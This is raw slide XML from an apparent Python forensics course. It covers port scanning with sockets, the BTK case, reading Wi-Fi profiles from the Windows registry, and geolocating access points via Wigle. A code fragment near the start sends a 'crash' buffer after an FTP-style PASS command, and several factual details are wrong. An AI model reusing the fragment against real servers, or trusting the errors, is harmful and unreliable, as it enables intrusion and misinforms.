                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>\r\n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encode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'utf-8'</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sock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recv</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1024</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sock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send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'PASS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>\r\n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encode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'utf-8'</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sock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recv</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1024</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sock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send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command</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crash</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\r\n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encode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'utf-8'</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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>time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sleep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4</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E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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a:t>Introduction – Murder case solved…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="875" name="Google Shape;875;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="416369" y="2255426"/>
            <a:ext cx="11480257" cy="4434000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The "BTK Killer" was a serial killer who committed 10 murders between 1974 and 1991. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The case remained unsolved until the killer sent a 3.5" floppy disk to a television station, which was then handed over to the police. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The floppy disk contained files and metadata that were embedded with Microsoft proprietary rich text format, including the killer's first name and last known location. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The killer's name was revealed to be Denis Rader, and he was found to have been working as a church officer at a local Wichita church. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The investigation was finally solved after DNA samples were taken from Rader's daughter. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334010" lvl="0" marL="334010" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The use of minimal codes and python programming was essential in solving this complex case.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="876" name="Google Shape;876;p2"/>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e9adf94182_2_50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91096" y="8514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TCP Full Connect Scan CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;g1e9adf94182_2_50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91096" y="2985223"/>
            <a:ext cx="11390700" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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The passage is describing two functions of the Python socket API: socket.socket and socket.create_connection.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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The socket.socket(family, type, proto) function creates a new socket instance, with the option to specify the socket family (AF_INET, AF_INE16, or AF UNIX), the socket type (SOCK_STREAM for a TCP socket or SOCK_DGRAM for a UDP socket) and the protocol number(usually zero and is omitted in most cases).</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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The socket.create_connection(address, timeout, source_address) function creates a new network socket by taking a tuple (host, port) as an input and returning an instance of the socket. It also has an optional parameter of taking a timeout and source address, which allows the user to set a time limit for the connection establishment and specify the source address of the connection.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;g1e9adf94182_2_50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565609" y="2282383"/>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Analysis of wireless access point : registry</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="882" name="Google Shape;882;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680324" y="2336875"/>
            <a:ext cx="11254009" cy="2818800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356870" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The Windows registry is a hierarchical database that stores configurational settings for the operating system. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356870" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In terms of wireless networking, it stores information about wireless connections, including geo-location information. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356870" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Using the command prompt, it is possible to access and list information about networks such as the profile Guid, network description, network name, and gateway MAC address. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356870" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This can be useful for troubleshooting and managing wireless connections on a Windows system.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="883" name="Google Shape;883;p3"/>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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3540"/>
              <a:t>Analysis of wireless access point : registry</a:t>
            </a:r>
            <a:endParaRPr sz="3540"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3540"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="889" name="Google Shape;889;p4"/>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890" name="Google Shape;890;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2336875"/>
            <a:ext cx="9891176" cy="2297725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="891" name="Google Shape;891;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="-1380" r="1380" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="612300" y="4702625"/>
            <a:ext cx="9891175" cy="2000250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="892" name="Google Shape;892;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">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a:t>WinReg to Read the Windows Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="898" name="Google Shape;898;p1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342900" lvl="0" marL="356871" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The Windows registry stores information about wireless connections, including the MAC address of the connected devices. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356871" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The MAC address is stored in the registry as a REG_BINARY type, which needs to be converted into a dedicated MAC address format using a function. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356871" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>By accessing the specific keys in the registry, it is possible to extract the network name along with their MAC addresses by iterating through every network profile. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356871" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The function Openkey() is used to open the key and loop through the network profiles. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356871" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The registry key for the network name and default gateway MAC address is the fourth and fifth key in the array. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="356871" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000"/>
              <a:t>It is important to run the code with administrator mode to access the registry.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="899" name="Google Shape;899;p12"/>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Using Mechanize to submit the Mac address to Wigle.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="905" name="Google Shape;905;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2103675"/>
            <a:ext cx="9613800" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-341630" lvl="0" marL="341630" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>In addition to finding the MAC address and network name, it is also possible to determine the physical location of a network access point. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-341630" lvl="0" marL="341630" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This can be done by accessing various databases, both open-source and proprietary (such as cell phone records), to find this information. One popular database is wigle.net, which can be accessed by opening the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://wigle.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>, logging in, and specifying the SSID or MAC address of the access point. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-341630" lvl="0" marL="341630" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The result includes the MAC address, as well as the GPS location (coordinates in terms of latitude and longitude) of the access point. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="906" name="Google Shape;906;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">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Using Mechanize to submit the Mac address to Wigle.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Google Shape;912;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2103675"/>
            <a:ext cx="9613800" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-341630" lvl="0" marL="341630" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>There are a variety of other databases that can be used to find the physical location of an access point, such as SkyHook (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.skyhookwireless.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>) and open-source projects like maclocate (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://code.google.com/p/maclocate/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>) and wigle.net</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This project has been moved to GitHub: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://github.com/iancmcc/maclocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>. This repository will no longer be updated.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="913" name="Google Shape;913;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
